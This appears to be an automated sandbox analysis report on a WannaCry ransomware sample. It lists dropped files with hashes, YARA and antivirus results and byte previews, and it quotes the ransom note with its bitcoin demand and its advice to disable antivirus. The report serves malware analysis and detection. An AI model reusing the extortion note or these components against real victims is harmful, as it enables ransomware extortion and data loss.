Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\r.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	864
Entropy (8bit):	4.5335184780121995
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
MD5:	3E0020FC529B1C2A061016DD2469BA96
SHA1:	C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
SHA-256:	402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
SHA-512:	5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...

C:\Users\user\Desktop\s.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3038286
Entropy (8bit):	7.998263053003918
Encrypted:	true
SSDEEP:	49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
MD5:	AD4C9DE7C8C40813F200BA1C2FA33083
SHA1:	D1AF27518D455D432B62D73C6A1497D032F6120E
SHA-256:	E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
SHA-512:	115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
Malicious:	true
Reputation:	unknown
Preview:	PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e.....e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c\|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7..0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ...H..2.N.BRSN...XC....).".@.._.18.&...n

C:\Users\user\Desktop\t.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	65816
Entropy (8bit):	7.997276137881339
Encrypted:	true
SSDEEP:	1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
MD5:	5DCAAC857E695A65F5C3EF1441A73A8F
SHA1:	7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
SHA-256:	97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
SHA-512:	06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....8"'....].~>(...PdIf.'.m>...2.0.`p...^...#I\|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(\|.8.L....67.gjrS.\|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.\|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.."AU..R....Y....d]....U....).@...Q....\|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w

C:\Users\user\Desktop\taskdl.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.1664845408760636
Encrypted:	false
SSDEEP:	96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
MD5:	4FEF5E34143E646DBF9907C4374276F5
SHA1:	47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
SHA-256:	4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
SHA-512:	4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\taskse.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.5252509618107535
Encrypted:	false
SSDEEP:	96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
MD5:	8495400F199AC77853C53B5A3F278F3E
SHA1:	BE5D6279874DA315E3080B06083757AAD9B32C23
SHA-256:	2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
SHA-512:	0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1\|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................\| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\u.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Documents\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.826783441450989
Encrypted:	false
SSDEEP:	24:884Ro0GfFxeyfM0ysuuHYE9pfeFZ9p8VlZyEJQiukJc:8oHfyyUH8HvgZgVlMWQiukJc
MD5:	37BCA6C89D479A1B704B52D49F68BB9B
SHA1:	FB4C5FDA7785623916A7E815FB2BDAE75CEE73DD
SHA-256:	04EFCA78321605F18E7F699F76067EE385935B91B6A3DA2BB6463686E220765D
SHA-512:	4B4CAABF2F4E9A2714BC8A46EE1F182D88A6654349F5A5DF5BB1BF997DF8F3FB8035BF25CFC9B4362E8C88EF86F852734D26FDE2B849AB85291808272F7EB004
Malicious:	false
Reputation:	unknown
Preview:	>....!.........R$7..h....Hd...........E...).u..A....1f..f.Dk..8...53AN.....s..lA.E.:.E.Sh......o.1.]. ....^...[.-;..TZ.;...39.6.9.\.._+^...B....Gn[....g.pK.g.i.....M.{..?.O_....5.~.....`.......Q.D......U.A...D.....}.....7<.@.........g..f.........C.\U.op>...S.f..2!..5.8.X..).!....`.......<u.E0.9.....+p..g..0!..@s.\|...8`....7...].....F.o.^yU6\|.Y.^-.#.x.:EtkE.....z..K.....{..#.8........{...6Q..Ye$.g.j..F..P.v....7:7......k.\|P$.....d..n...,-..RS..0[E........^.aH5.^.y40.......J{4...z....G\jH...F,....~.q....k.)...OH...NO.........v.3.O....auE..f.e#.s.H.z..~..d..k...b..........N.06.M.2..S...=QrY...j.)..E"F."8.}V.;kMm.o..Nd.\|.......Cv_..3x.#.8.1...j@R.......DTG...D.&.....C.!XV!..'G..N..J>......%..,.S....(.3...../.P.._3....JP5@....Dn...k.}......rs.y...t.!...zh.....x.i.[.G ,;.QT3l......{.....V..L.(w.>.npM..x...:..+.3...C...!2;...d(.9J"......f`.(.._.h.V..E......=!.`.4XI.M.z$.#g.\|..9.:......z.....7.M..J.*qJ..X:.^..i,)..S.#>@,..v..c.22.j.].F=..Q,

C:\Users\user\Documents\CZQKSDDMWR.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.832588097236959
Encrypted:	false
SSDEEP:	24:bkoy11J73I0lGpMmMU96DBUJnLBrC+gCtgR4G3JkbtqJC0bh31S:bkoq8pM7U2+g94G5/zhFS
MD5:	32DFFDD8A8B7D15518988C2CAFD82058
SHA1:	09146186CEE7F4FE78D231A0C387EA9647EDC3C9
SHA-256:	B133385E55EAE3008BFFC70AA88613DA740418AE1D0D069A14512AA101BF15B7
SHA-512:	4E396E7D4407B71043F831EBD8927E5DCB8E8E959B0EA7C9929B1783CF697EC4EA6910C9E5379EFCE0F5E5A8D594B3DA48E36357D0EE076EDAD11505A9723BB8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........?-....t].~4..&.%..K.).i.Q....qA..Q.R.Wo.Cd...&..Yb.W#xh.....y...Z...V.C/.....B9]H\|...z.....:....B0.3.Q&.%....)..>...zn...&OZ......b....?.v..V..\|....N...'...De...#.2.a...8........&.H..t.E..L....-..XH..(........cW..'.jw..4.V%j0dZ...K.............F.!.#.h;.V.B.ZR.]..4.I8Q...d.s...#l].JK.B..0.".r`.....6d.n&...w..R...o.d.Y.i..?T........4..w....".5.(sVpg.G..'&q......A..3../{..7.{M.....C[S:.....g..G.(.a0.\.HT\..=..y;.!...&..rY..P.".I.U.S..QA._8(..t.A[e..}]W....S.m..JhI..Z..sUX...T.............-Z.......0 ..f......M..s3.#.O.-....fHV`u.X..f..k..n......C.;.U..;!I.Y....g.^f....z3Qv.OF...i...tHZt.z..Rz....5.L.J....-.....E..FKM.U.8...(....{!.@_C>.C'.....b/.M..;}M#.....Y..z..u.].........D..U.X...b.Z...aX.....T....z .BZ.....u...\......q.R.........W.s5w..8v.CR..k!.x......p.XR.b.u#n<...m8 ].y...%4Y.].......%.4....1.O.....$....\....C.a.N).m.?...~.. ).O.'.I.jDO......U#*.i......o.....$.}}.I4.4.o...........z...j..

C:\Users\user\Documents\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.832588097236959
Encrypted:	false
SSDEEP:	24:bkoy11J73I0lGpMmMU96DBUJnLBrC+gCtgR4G3JkbtqJC0bh31S:bkoq8pM7U2+g94G5/zhFS
MD5:	32DFFDD8A8B7D15518988C2CAFD82058
SHA1:	09146186CEE7F4FE78D231A0C387EA9647EDC3C9
SHA-256:	B133385E55EAE3008BFFC70AA88613DA740418AE1D0D069A14512AA101BF15B7
SHA-512:	4E396E7D4407B71043F831EBD8927E5DCB8E8E959B0EA7C9929B1783CF697EC4EA6910C9E5379EFCE0F5E5A8D594B3DA48E36357D0EE076EDAD11505A9723BB8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........?-....t].~4..&.%..K.).i.Q....qA..Q.R.Wo.Cd...&..Yb.W#xh.....y...Z...V.C/.....B9]H\|...z.....:....B0.3.Q&.%....)..>...zn...&OZ......b....?.v..V..\|....N...'...De...#.2.a...8........&.H..t.E..L....-..XH..(........cW..'.jw..4.V%j0dZ...K.............F.!.#.h;.V.B.ZR.]..4.I8Q...d.s...#l].JK.B..0.".r`.....6d.n&...w..R...o.d.Y.i..?T........4..w....".5.(sVpg.G..'&q......A..3../{..7.{M.....C[S:.....g..G.(.a0.\.HT\..=..y;.!...&..rY..P.".I.U.S..QA._8(..t.A[e..}]W....S.m..JhI..Z..sUX...T.............-Z.......0 ..f......M..s3.#.O.-....fHV`u.X..f..k..n......C.;.U..;!I.Y....g.^f....z3Qv.OF...i...tHZt.z..Rz....5.L.J....-.....E..FKM.U.8...(....{!.@_C>.C'.....b/.M..;}M#.....Y..z..u.].........D..U.X...b.Z...aX.....T....z .BZ.....u...\......q.R.........W.s5w..8v.CR..k!.x......p.XR.b.u#n<...m8 ].y...%4Y.].......%.4....1.O.....$....\....C.a.N).m.?...~.. ).O.'.I.jDO......U#*.i......o.....$.}}.I4.4.o...........z...j..

C:\Users\user\Documents\EWZCVGNOWT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802108679014321
Encrypted:	false
SSDEEP:	24:W6uxqqjVwXohs9ghHpleBaU20CBN3mmcSYyeoJBJDSumc6:0HjV+9ghjU200rwyegvDvmc6
MD5:	91F236C086E6DF7898D64F3BCC76BC5B
SHA1:	75321F95BD5A738E3EC47E21FD82C27EB14904B4
SHA-256:	57800C307B9D789C7654E0F35E0D313C0F2176F8DAB9D6E6BB7FF9FF6FFD032B
SHA-512:	D05FEC8657B599D38057759100482ECB2425A4FB52E434406FD5FBA86EA392A6C9E8C7AA61D8F89D3B3CC601ED0665875478D7B52F7632BE7A336FC72988F49E
Malicious:	false
Reputation:	unknown
Preview:	..}...l.O.9."....T.M.^.i..=ip-..R.\..D...x.n...`.q~-(....c7.b../........a0e.JjK.^m9...hd.G...J.s+..g[`....#0aO..'~=..?.]..`.W\|..ED.\.-...5.u.p...r.c\|@3.Q\|.mhV...;.x..s.....{. .C...}...:..Qd....a.R...{\...Ix..;..E...D..&g..a.U(.B^...y..M.?V..}..K..b.....KO`a.q.n.2.8.\...H .....T..K..L.Q......1_...M...R.f....z.e[.b..l....!.\|..Xiv2.Y...u.G.4+.5...lCd\|...kq.......D...e[...Sw.......x`\|......B....M@.7:%..R{........w...~....%2..k.Yo'.,...~w.\E>....I.....'.....ez.X.AN..u..L'..ZA..wx....0.K.....Y.4.}....._..C../ "e.v..Nl...F.i.f<.P>..G.}......l./......j+....~....4....GX.{Q(....G.E...n....G..C. ...Z.......=..N.....5~.RL`...4..8..>..!.........9..<.....$...){.0..J..b..i.k.:.e.....Q..e..... ^....ckn..?.h...,S:?.....?^iW.l`-..WLD....5.r...eP.74.S.^}Zs.].7N..hY.M.?..$......X.n-z.A....'P.E.P1.....1[....j...J.u....G.....i..DK..XF..{....^.Fz.'T..y:.$.[a.\.w........p]..<...R}.{..*.i.eR.+.9U.GS.;.y..Rq..gq.E.^7-.A..@3].......S.A.v...E...\|r.O_X...<.P..T

C:\Users\user\Documents\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.859083821407929
Encrypted:	false
SSDEEP:	24:bk+vQWvFSU7+qL/zJ/tcsJ7Ae5QI1d60BHEiXy+3kMaf+wQgO6lv/RzlFuWuMeYH:bk+vQmH+qvzcsDd1dTw+3O+XgO6l3Rzr
MD5:	C59C084329AA7642BE7ED94C39A1B6A0
SHA1:	BAE6350ABC9CD0C68377D3631A68B35444F5A61E
SHA-256:	5C772ED0F9BAD563ADEF60C2464D46245D98864200C3DD3DCB974CCB666FB69E
SHA-512:	F1A5FE7E4D190494A07D94D6D85D892B28C6CE7064D3FEC1CB379BC6A4897543F1DB9D9673857C6E710591BA01405B7AA3B8D86ACB464E5A92DE84C7260C4E42
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....p.7j.'eY5.S+.&e_.C...o....tb......B...y..}C.........iP.}..$._.p8....I.....3W.F_..;..V.eH`@,...DH...c...V..D.b.....3....;{.n..J.....8"8.5.x.b.lS2=..&..&_t..L..uPQ..<7..!.>l.V.....b.X..U......P...4..../.iU..u.@x.....V./. ...x#...../.q{..'c...;.............}3.....1....8...(..^.'}...w.Z...f[...y.M.@d.....U...].$.mx>.$O....yC.;QV..U...]..{.35..9...M....L.#..w.V........O...W.e.13.\DX.........'.1...d.XH1.O%D...[@3.,.a#y-...E...N@]..@.S<.....V..........Yn......0[.X.J...P...S.M..rml..Qp.O4.).717..+..sS..`/.p.h......^.4VD....?..&v}.......E.bg...S..?%.G._..p.Ha..I....<..W..6..veo.p...gcf .){..........}..eM.~....av...K.z`....T..r`:.PgJp...,IA@...P.E...e.6!y...sor..nRe..ja..G....E.K._.Z.k.x4..p..dm."W.....S.p.\|H...O.Ww.y.F....g..-..a...$.G..u......N'`.UeV.O..]+..l..X.a.".n..<L=n/.AOvF.U..?..o....S?..@......F.f..t#.U{p.j2Tz....r...1...>.eid..Jf:....!.]f...Y........Y.i...[......i..o'.....I#....4.V......Qd...x;..jl..7.J. ....m

C:\Users\user\Documents\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.859083821407929
Encrypted:	false
SSDEEP:	24:bk+vQWvFSU7+qL/zJ/tcsJ7Ae5QI1d60BHEiXy+3kMaf+wQgO6lv/RzlFuWuMeYH:bk+vQmH+qvzcsDd1dTw+3O+XgO6l3Rzr
MD5:	C59C084329AA7642BE7ED94C39A1B6A0
SHA1:	BAE6350ABC9CD0C68377D3631A68B35444F5A61E
SHA-256:	5C772ED0F9BAD563ADEF60C2464D46245D98864200C3DD3DCB974CCB666FB69E
SHA-512:	F1A5FE7E4D190494A07D94D6D85D892B28C6CE7064D3FEC1CB379BC6A4897543F1DB9D9673857C6E710591BA01405B7AA3B8D86ACB464E5A92DE84C7260C4E42
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....p.7j.'eY5.S+.&e_.C...o....tb......B...y..}C.........iP.}..$._.p8....I.....3W.F_..;..V.eH`@,...DH...c...V..D.b.....3....;{.n..J.....8"8.5.x.b.lS2=..&..&_t..L..uPQ..<7..!.>l.V.....b.X..U......P...4..../.iU..u.@x.....V./. ...x#...../.q{..'c...;.............}3.....1....8...(..^.'}...w.Z...f[...y.M.@d.....U...].$.mx>.$O....yC.;QV..U...]..{.35..9...M....L.#..w.V........O...W.e.13.\DX.........'.1...d.XH1.O%D...[@3.,.a#y-...E...N@]..@.S<.....V..........Yn......0[.X.J...P...S.M..rml..Qp.O4.).717..+..sS..`/.p.h......^.4VD....?..&v}.......E.bg...S..?%.G._..p.Ha..I....<..W..6..veo.p...gcf .){..........}..eM.~....av...K.z`....T..r`:.PgJp...,IA@...P.E...e.6!y...sor..nRe..ja..G....E.K._.Z.k.x4..p..dm."W.....S.p.\|H...O.Ww.y.F....g..-..a...$.G..u......N'`.UeV.O..]+..l..X.a.".n..<L=n/.AOvF.U..?..o....S?..@......F.f..t#.U{p.j2Tz....r...1...>.eid..Jf:....!.]f...Y........Y.i...[......i..o'.....I#....4.V......Qd...x;..jl..7.J. ....m

C:\Users\user\Documents\EWZCVGNOWT\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Documents\EWZCVGNOWT\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\Documents\EWZCVGNOWT\EWZCVGNOWT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
